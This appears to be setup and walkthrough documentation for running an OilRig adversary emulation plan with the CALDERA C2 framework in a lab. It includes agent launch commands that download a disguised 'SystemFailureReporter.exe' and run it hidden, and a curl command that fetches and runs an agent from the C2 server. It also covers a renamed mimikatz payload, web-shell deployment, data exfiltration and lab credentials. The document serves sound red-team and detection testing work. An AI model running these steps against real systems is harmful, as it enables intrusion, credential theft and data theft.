# CALDERA C2 Server

  • Linux/Mac OS, 64-bit
  • git commandline installed
  • python3.7+ with pip3
    • python3.9+ recommended
  • golang 1.17+
    • required for dynamic agent compilation

# Attacker Machine Dependencies

  • Linux OS, 64-bit
    • Kali recommended
    • Can be the same machine as the CALDERA C2 server if needed.
  • Command-line tools
    • xfreerdp
    • xdotools
    • curl


# Download and Install CALDERA

Run the following on a Linux/Mac machine of your choice. This machine will act as your C2 server, or the "attacker" host. For the purposes of this walkthrough, the C2 server will have an IP address of

git clone --depth 1 https://github.com/mitre/caldera.git --recursive
cd caldera
git checkout master && git pull
cp conf/default.yml conf/local.yml

Add the emu plugin add emu to your conf/local.yml configuration file. Feel free to enable or disable other plugins by adding/removing them from the configuration file. You can also configure your user accounts and credentials if needed.

vi conf/local.yml

Download pip dependencies.

pip3 install --upgrade setuptools
pip3 install --upgrade pip
pip3 install -r requirements.txt

Download required payloads for emu plugin.

# from caldera/plugins/emu directory 

git checkout master && git pull

Run your C2 server from the caldera directory. This will unzip encrypted executables throughout the adversary-emulation-library and ingest its emulation plans.

# from caldera directory

python3 server.py --insecure --log DEBUG

Update payload name for mimikatz to m64.exe. Note: this may require a server restart for Caldera to pick up the new payload.

# from caldera/plugins/emu directory

cp payloads/mimikatz.exe m64.exe


# Launch Agents

Launch the first agent by running the following command on (THEBLOCK) as the user gosta. The password for gosta is d0ntGoCH4ingW8trfalls. Note that you may need to replace gosta with the applicable username, if you are not using the gosta user. This agent is meant to replace SideTwist payload used in the original scenario.

mkdir  "C:\Users\gosta\AppData\local\SystemFailureReporter";
cd  "C:\Users\gosta\AppData\local\SystemFailureReporter";
$server=""; # change IP address for your CALDERA C2 server according to your environment
$wc=New-Object System.Net.WebClient;
get-process | ? {$_.modules.filename -like "C:\Users\Public\SystemFailureReporter.exe"} | stop-process -f;
rm -force "C:\Users\Public\SystemFailureReporter.exe" -ea ignore;
[io.file]::WriteAllBytes("C:\Users\Public\SystemFailureReporter.exe",$data) | Out-Null;
Start-Process -FilePath C:\Users\Public\SystemFailureReporter.exe -ArgumentList "-server $server -group gosta" -WindowStyle hidden;

RDP to, the Kali attacker host, as user saka with password ceKa#zUUc4^9yZ. You may need to modify the command so the server value matches your attacker host's IP address. Launch the second agent by running the following command. Note: keep this RDP open as this will be leveraged by xfreerdp in the executed Caldera operation.

# from the caldera directory

cd "plugins/emu/data/adversary-emulation-library/oilrig/Resources/payloads/TwoFace";
curl -s -X POST -H "file:sandcat.go" -H "platform:linux" $server/file/download > splunkd;
chmod +x splunkd;
./splunkd -server $server -group kali -v

Log into CALDERA's web GUI by accessing your C2 server address in a web browser (Chrome recommended), and using your credentials (default username is red, default password is admin).

Make sure you can see your agents after clicking the agents option on the menu on the left, under "Campaigns".

For best results, make sure you don't have other agents currently beaconing in.

# Planner

This port requires CALDERA to run each ability on a specific agent. For example, some abilities should run only on the gosta group of agents, while other abilities should run only on the kali group of agents. Therefore, this port uses a custom planner which specifies the agent group that should run each ability.

The commands to start agents will include a -group flag to specify the agent's group. This group will correspond to the group listed in the custom planner. If the groups that are specified in Launch Agents are edited, the group names in the planner will need to be updated correspondingly.

# Fact Setup

Before running the operation, you will need to make sure that the OilRig fact source is properly configured for your environment. While default fact values are provided, they will need to be replaced by the appropriate values specific to your testing environment. On the left menu, under Configuration, select fact sources. Under the "Select a source" drop-down menu, select OilRig (Emu), which is the fact source for the OilRig adversary. From there, update the following facts as needed:

  • initial.target.user: The username of the initial target.
  • initial.target.password: The password of the initial target.
  • second.target.host: The hostname address of the second target.
  • second.target.ip: The IPv4 address of the Exchange server.
  • network.domain.name: The network domain name for initial target system
  • caldera.server.ip: The IPv4 address of the attacker system.
  • caldera.user.password: The password for the attacker system.
  • caldera.user.name: The username of the attacker system.
  • second.target.user: The username for the SQL server administrator.
  • second.target.ntlm: NTLM hash value for the user of the SQL server administrator.
  • third.target.ip: The IPv4 address of the SQL server.
  • exfil.target.email: The adversary-controlled email address used to exfiltrate data.
  • server.api.key: The API key for the CALDERA server.

# Operation Setup

After adjusting the fact source as needed, select operations from the left menu, under "Campaigns".

Select "+ Create Operation" to the right of the drop-down menu.

Add in an appropriate name for your operation.

For the adversary profile, select OilRig.

For the Fact Source, select OilRig (Emu).

Select Advanced to expand the Advanced configurations.

For Group, make sure All Groups is selected.

For the Planner, select OilRig Planner.

Make sure the plain-text obfuscator is selected.

For Autonomous, make sure "Run Autonomously" is selected.

For the Parser, select "Do not use default parsers".

For Auto-close, you can decide whether or not you want the operation to auto-terminate or stay open until someone terminates the operation.

For Run state, make sure "Run immediately" is selected.

Adjust Jitter as needed if you want the operation steps to occur with greater or lesser frequency.

Keep visibility at 51.

When ready, hit the Start button and wait for your operation to complete.


Press the stop button in the operation GUI to finish the operation. Terminate the Kali agent from the GUI or RDP/SSH into the machine to stop the agent processes.

# Cleanup

The following commands should be run on (THEBLOCK):

del C:\Users\Public\contact.aspx;
del C:\Users\gosta\AppData\local\SystemFailureReporter;
del C:\Users\Public\SystemFailureReporter.exe;

# Exfiltrated Files

Throughout the operation, some files will be exfiltrated through a CALDERA agent back to the CALDERA server.

The directory on the CALDERA server machine that contains the uploaded files depends on the exfil_dir setting within the CALDERA configuration file (/tmp/caldera by default). Within this exfil directory, you'll find a subdirectory of the format hostname-agentidentifier, where hostname is the hostname where the agent was running, and the agent identifier is the unique identifier for the agent. The encrypted uploaded files will be in that subdirectory.

To decrypt the uploaded files, you can use the decryption utility provided in app/utility/file_decryptor.py within the CALDERA main directory. Run it and pass in the path to the CALDERA configuration file used (e.g. default.yml or local.yml) as well as the path to the input file and output file (change file paths in the example as needed).

python3 ~/caldera/app/utility/file_decryptor.py -c ~/caldera/conf/local.yml /tmp/caldera/gammu-agent123/encrypted_exfil.file decrypted_exfil.file


# Step 1

  • Initial access will be performed by running a CALDERA agent executable named SystemFailureReporter.exe, rather than a malicious Word document with VBA macros. The agent will act as the remote access implant and is a compiled .exe written in Golang.
    • The SideTwist payload, update.xml, and b.doc will not be used
    • SystemFailureReporter.exe as used in evals will be replaced by the CALDERA agent named SystemFailureReporter.exe.
  • Following initial access, the agent will use two VBS scripts to collect the hostname and username environment variables, mimicking the macro used in evals.
  • The agent will not perform sandbox detection checks using Application.MouseAvailable.
  • The agent will not use GetUserName API, GetComputerName API, and GetDomainName API to find the current user, hostname, and domain respectively.

# Step 2

  • The CALDERA agent will run all of the commands in Step 2 via cmd.exe. However, the commands will be executed separately instead of being chained together. From a defender's viewpoint, the port's execution will appear as:
    SystemFailureReporter.exe executed cmd.exe /C whoami
    SystemFailureReporter.exe executed cmd.exe /C hostname
    SystemFailureReporter.exe executed cmd.exe /C ipconfig /all
    as opposed to the scenario's execution, which would have appeared as:
    SystemFailureReporter.exe executed cmd.exe whoami & hostname & ipconfig /all ... 2>&1

# Step 3

  • b.exe will be downloaded to the workstation as a payload from the CALDERA server. In the port, b.exe will be automatically deleted when it stops running, as opposed the original scenario, where b.exe is deleted in Step 11.
  • fsociety.dat will be exfiltrated via the C2 channel to the CALDERA exfil directory, which is by default /tmp/caldera on the CALDERA server host. More information regarding exfiltrated files is available above.

# Step 4

  • Contact.aspx will be uploaded as a payload to the CALDERA server. It will be downloaded to THEBLOCK through the C2 channel, and will then be copied to the WATERFALLS Exchange Web Services directory. In the original scenario, contact.aspx is downloaded directly to the C:\Users\Public\ directory on THEBLOCK. However, in the port, CALDERA will download contact.aspx to the agent's current directory, which will be C:\Users\gosta\AppData\Local\SystemFailureReporter\. Then, Step 4.A.1 will copy the file from C:\Users\gosta\AppData\Local\SystemFailureReporter\ to C:\Users\Public\.
  • The ability labeled as Step 4.A.2 "Server Software Component: Web Shell" (T1505.003) includes Step 4.A.3, "Hide Artifacts: Hidden Files & Directories" (T1564.001).
  • Step 4.A.5, "Indicator Removal on Host: File Deletion" (T1070.004) will be included in the cleanup command for Step 4.A.1.

# Step 5

  • This step will be performed by the agent that was manually launched on the "attacker" system.
  • The -s flag was added to the curl commands to activate "silent" mode. This restricts the progress meter from displaying in order to allow CALDERA GUI to properly capture terminal output. The -s flag will also restrict error messages from appearing.
  • In this step and in all following steps, the password for gosta has been changed from d0ntGoCH4$ingW8trfalls to d0ntGoCH4ingW8trfalls.

# Step 6

  • The -s flag was added to the curl commands to activate "silent" mode. This restricts the progress meter from displaying in order to allow CALDERA GUI to properly capture terminal output. The -s flag will also restrict error messages from appearing.

# Step 7

  • plink.exe will be downloaded to the workstation as a payload from the CALDERA server. In the original scenario, plink.exe is initially downloaded to C:\Users\Public\Downloads\plink.exe. In the port, it will be downloaded through the C2 channel to the same folder as the agent on the THEBLOCK. Then, it will be copied to the Downloads folder.
  • The additional -no-antispoof flag was added to avoid the required interaction step.
  • Step 7.A.3, "Valid Accounts: Domain Accounts" (T1078.002) is included in Step 7.A.4.
  • Steps 7.A.2 and 7.A.4 are run using exec-background which runs a command as a background process. The /cert-ignore parameter is also added to Step 7.A.4.
  • The password for saka has been changed from $ceKa#zU$Uc4^9yZ to ceKa#zUUc4^9yZ.

# Step 8

  • xdotool is used to control the RDP session to Because xdotool controls a remote system using pre-determined key presses, the sequence of key presses in Step 8 may need to be modified depending on your environment.
  • Step 8.A.9 includes Steps 8.A.5 through 8.A.8.

# Step 9

  • In continuation from Step 8, xdotool is used to control the RDP session.

# Step 10

  • In continuation from Step 8, xdotool is used to control the RDP session.
  • Step 10.A.6 includes Steps 10.A.1-10.A.6

# Step 11

  • Because the gosta agent replaces SideTwist, the gosta agent will be killed instead of killing SideTwist. Additionally, update.xml was not used in the port so it does not need to be deleted in the cleanup stage.
  • The API key fact value may need to be updated to your server's API key in order to modify the gosta agent's watchdog value, which then kills the agent.
  • b.exe was saved to agent's location as a payload, was run from that location, and was automatically deleted when the command finished. Therefore, it will not be deleted in this step.